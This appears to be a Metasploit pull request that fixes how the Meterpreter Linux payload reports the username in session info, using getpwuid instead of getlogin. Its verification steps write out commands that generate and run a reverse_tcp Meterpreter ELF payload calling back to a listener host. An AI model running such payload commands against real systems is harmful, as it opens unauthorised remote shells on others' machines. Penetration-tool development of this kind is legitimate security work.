### PR TITLE
fix #190, fix username in session info

### DIFF
--- a/mettle/src/stdapi/sys/config.c
+++ b/mettle/src/stdapi/sys/config.c
@@ -12,6 +12,7 @@
 #include <mettle.h>
 #include <sigar.h>
 #include <time.h>
+#include <pwd.h>
 
 #include "log.h"
 #include "tlv.h"
@@ -67,7 +68,12 @@ struct tlv_packet *sys_config_getuid(struct tlv_handler_ctx *ctx)
 #   define HOST_NAME_MAX MAXHOSTNAMELEN
 #  endif
 # endif /* HOST_NAME_MAX */
-	char *username = getlogin() ? getlogin() : "no-user";
+	char *username = "no-user";
+	struct passwd *pw = getpwuid(geteuid());
+	if (pw)
+	{
+		username = pw->pw_name;
+	}
 	char hostname[HOST_NAME_MAX] = "no-hostname";
 	gethostname(hostname, HOST_NAME_MAX);
 	p = tlv_packet_add_fmt(p, TLV_TYPE_USER_NAME,


### PR DESCRIPTION
This fixes #190 and https://github.com/rapid7/metasploit-framework/issues/12875
Currently on Linux the `msf5 > sessions` is showing `no-login` as the user.
This fixes it so it shows the correct username.

# Verification
```
# Create a handler and start it
msfconsole -qx "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
# Run a payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f elf -o met && ./met
# Run sessions -x
msf5 exploit(multi/handler) > sessions -x
```

# Before
```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                               Connection
  --  ----  ----                   -----------                                                               ----------
  1         meterpreter x64/linux  no-login @ hostname (uid=1000, gid=1000, euid=1000, egid=1000) @ ......
```

# After
```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                               Connection
  --  ----  ----                   -----------                                                               ----------
  1         meterpreter x64/linux  theactualusername @ hostname (uid=1000, gid=1000, euid=1000, egid=1000) @ ......
```
